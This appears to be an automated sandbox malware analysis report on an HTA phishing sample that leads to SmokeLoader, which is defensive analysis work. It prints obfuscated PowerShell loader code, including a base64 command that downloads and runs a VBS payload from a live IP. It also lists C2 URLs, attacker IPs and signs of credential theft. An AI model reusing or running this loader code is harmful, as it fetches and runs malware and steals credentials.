'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagemen
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7608, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline", ProcessId: 7772, ProcessName: csc.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-08T11:09:49.834350+010020391031A Network Trojan was detected192.168.2.44974446.173.214.1480TCP
                2025-01-08T11:09:54.445641+010020391031A Network Trojan was detected192.168.2.44974646.173.214.1480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-08T11:08:59.528574+010028587951A Network Trojan was detected192.168.2.449733192.3.27.14480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-08T11:09:50.092954+010028298482Potentially Bad Traffic46.173.214.1480192.168.2.449744TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://prolinice.ga/index.phpAvira URL Cloud: Label: malware
                Source: http://vilendar.ga/index.phpAvira URL Cloud: Label: malware
                Source: 0000000D.00000002.2020378566.00000000009A0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
                Source: begoodforeverythinggreatthingsformebetterforgood.htaVirustotal: Detection: 10%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02793098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,17_2_02793098
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02793717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,17_2_02793717
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02793E04 RtlCompareMemory,CryptUnprotectData,17_2_02793E04
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0279123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,17_2_0279123B
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_027911E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,17_2_027911E1
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02791198 CryptBinaryToStringA,CryptBinaryToStringA,17_2_02791198
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02791FCE CryptUnprotectData,RtlMoveMemory,17_2_02791FCE
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02F526AC lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,19_2_02F526AC
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_02CA178C lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,20_2_02CA178C
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_02CA118D CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,20_2_02CA118D
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_0279263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,22_2_0279263E
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_0279245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,22_2_0279245E
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_02792404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,22_2_02792404
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 27_2_027925A4 CryptBinaryToStringA,CryptBinaryToStringA,27_2_027925A4
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 27_2_02792799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,27_2_02792799

                Phishing

                barindex
                Source: Yara matchFile source: begoodforeverythinggreatthingsformebetterforgood.hta, type: SAMPLE
                Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.pdb source: powershell.exe, 00000004.00000002.1762483774.0000000004F17000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.1973004774.000000000707B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1971140719.00000000068D0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.dotnetihascustomattributeczprocess_informationcxcydnlib.dotnet.mdrawassemblyrefrowhmdnlib.dotnet.writermethodbodychunkshlmicrosoft.win32.taskschedulernetworksettingshohnhihhhkhjhehdhghfhamicrosoft.win32.taskschedulertaskschedulersnapshothchbcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypefa`1hyhxdnlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowhzmicrosoft.win32.taskschedulertaskhuhthwdnlib.dotnet.writermetadataoptionshvhqdnlib.dotnetimdtokenproviderhphshrdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypeilimdnlib.dotnetifullnamecreatorhelperinioihiidnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsijikiddnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvt
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+b source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: aspnet_compiler.pdb source: icgfugf, 0000000F.00000000.2187284917.0000000000732000.00000002.00000001.01000000.0000000F.sdmp, icgfugf.14.dr
                Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.1973004774.000000000707B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1971140719.00000000068D0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.1973004774.000000000707B000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02792B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,17_2_02792B15
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02793ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,17_2_02793ED9
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02791D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,17_2_02791D4A
                Source: C:\Windows\explorer.exeCode function: 18_2_001930A8 FindFirstFileW,FindNextFileW,FindClose,18_2_001930A8
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02F5255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,19_2_02F5255C
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_02CA14D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,20_2_02CA14D8
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_02CA13FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,20_2_02CA13FE
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_02CA15BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,20_2_02CA15BE
                Source: C:\Windows\explorer.exeCode function: 21_2_005D1EB4 FindFirstFileW,FindNextFileW,FindClose,21_2_005D1EB4
                Source: C:\Windows\explorer.exeCode function: 21_2_005D1DB0 FindFirstFileW,FindNextFileW,FindClose,21_2_005D1DB0
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

                Software Vulnerabilities

                barindex
                Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.4:49733 -> 192.3.27.144:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 46.173.214.14:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 46.173.214.14:80
                Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 46.173.214.14 80
                Source: Malware configuration extractorURLs: http://prolinice.ga/index.php
                Source: Malware configuration extractorURLs: http://vilendar.ga/index.php
                Source: Yara matchFile source: 8.2.powershell.exe.643a1f0.0.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: GET /250/evenmegoodfor.txt HTTP/1.1Host: 192.3.27.144Connection: Keep-Alive
                Source: Joe Sandbox ViewASN Name: GARANT-PARK-INTERNETRU GARANT-PARK-INTERNETRU
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: Network trafficSuricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 46.173.214.14:80 -> 192.168.2.4:49744
                Source: global trafficHTTP traffic detected: GET /250/sweetnessgoodforgreatnessthingswithgood.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.27.144Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://prfkokybvrvkyi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: prolinice.ga
                Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://prolinice.ga/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 4431Host: prolinice.ga
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: unknownTCP traffic detected without corresponding DNS query: 192.3.27.144
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04987A18 URLDownloadToFileW,4_2_04987A18
                Source: global trafficHTTP traffic detected: GET /250/sweetnessgoodforgreatnessthingswithgood.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.27.144Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /250/evenmegoodfor.txt HTTP/1.1Host: 192.3.27.144Connection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
                Source: global trafficDNS traffic detected: DNS query: prolinice.ga
                Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://prfkokybvrvkyi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: prolinice.ga
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 10:09:49 GMTServer: Apache/2.4.59 (Debian)Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 35 32 64 35 33 0d 0a 84 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f ac 79 dd 2f b5 84 79 6d 21 b3 90 51 dc c2 a5 14 5d bd 12 b6 4b 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a c0 a1 84 b8 ba d4 a3 62 52 1c ae d9 4b 5a 18 a9 1c db 20 3a d0 44 3f 55 06 6b bf 4b 63 27 f1 ac 4f fe d1 04 8b 3f ba 91 69 f9 fb 81 fe 97 af cd a6 40 69 e9 33 b2 a6 45 cc f6 83 0e 7c 20 5b 7d 1d a4 53 32 fe 9d cc 54 71 e4 4c 20 4c b2 37 b3 8e 0f 1b d8 40 78 f3 c6 c7 84 1a aa 21 d4 fa 17 f2 46 ab 2a 9b db a1 fa 45 c5 f8 a8 f5 78 d7 7b c7 34 f8 40 a6 ce 9e 68 07 d1 3b db 70 67 ae de de 5f 1b 81 d3 b1 e8 be 06 9b bd 51 aa 40 d1 5b 4e 04 32 d7 97 2a e0 96 cc f3 08 be 06 f4 ef f1 48 d0 25 d9 73 3b 22 c7 0f b5 72 bf c3 e5 81 32 31 c9 f4 a1 4c ee 90 56 05 52 a9 1c 76 6f 99 dc ff 39 62 09 4e 0e 7c a8 50 2c 99 64 73 2c f8 8e 19 ec 5e 4c 2b 1b 6a 20 6d e3 2e 26 3e f2 ee 67 21 84 c5 3d 2f 72 90 3a ea 6c 5f b3 01 1d 55 2a 97 6b 1b 48 d7 18 d0 92 ef 20 3e 28 8e b6 b7 0f 4f c2 e3 41 ee a3 e2 e5 4f 7c 04 cf 84 8c 71 e5 91 3b ef 9c 40 2b b4 81 b3 6f 0c e5 ea f4 a9 02 25 53 be 6e 6e 71 ce db f8 20 6e 55 5b a4 66 26 ed 43 1b d2 35 1a 47 54 5d 20 0c 1b 03 8a 54 94 fb f1 d9 5d 91 01 a9 f6 90 b3 3e c6 10 cc 67 ca 7b 76 0b 97 06 5b d8 d2 e2 0f 79 af ed 1b 53 92 e1 e9 cc 7a b6 b9 98 42 38 a5 00 49 58 88 86 83 3c a1 5c d3 72 7d ad bc 8d 80 b4 ea 85 32 d9 b9 33 ce ae d5 90 f4 bb 3a c9 3d 3b 48 a7 e3 58 dd be d0 8a aa 01 3e 48 f4 19 2b 95 d5 65 ff b4 78 a1 d2 cd 69 0a 91 f7 6a 18 3d 4f 75 b1 bc 1b b1 60 c8 27 8c 70 db 33 0d a6 f2 ed 80 8d aa 7c 4a 8c 59 8c 3d 99 a9 52 09 0f d9 5e 58 eb 6f 11 c9 5b 23 0e a9 04 11 b7 a5 6b eb 6e 85 01 89 5e cf 54 06 96 02 2d c3 92 6c 61 40 ee 39 ff fa 3e 0d c6 24 8f 1c 02 ac 7a ab 13 d0 be a8 cb 90 7c 6b d5 fb ae 58 ee db 76 10 36 cb d3 c0 5d 0e e0 08 4f 38 94 52 92 70 bf 7c bd c4 0d 6f f9 74 7a 41 a6 59 ea 90 d6 8f 1b 32 75 08 c5 9a 2d a0 6a 8b fd 6b c4 c2 37 35 48 bd 8c 96 77 e4 62 45 8d 49 72 d0 11 c5 42 47 60 cf 79 cc d5 44 76 86 c6 57 e5 fc f1 b9 98 00 52
